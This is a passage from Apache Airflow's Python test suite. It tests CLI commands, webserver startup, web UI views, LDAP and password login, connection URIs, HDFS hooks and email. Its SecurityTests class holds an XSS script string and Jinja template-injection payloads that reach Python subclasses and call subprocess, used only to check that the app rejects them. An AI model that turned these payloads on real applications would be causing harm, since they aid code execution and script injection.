cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except:
# exception is expected here since dag doesnt exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run,
# and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='us-ascii', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
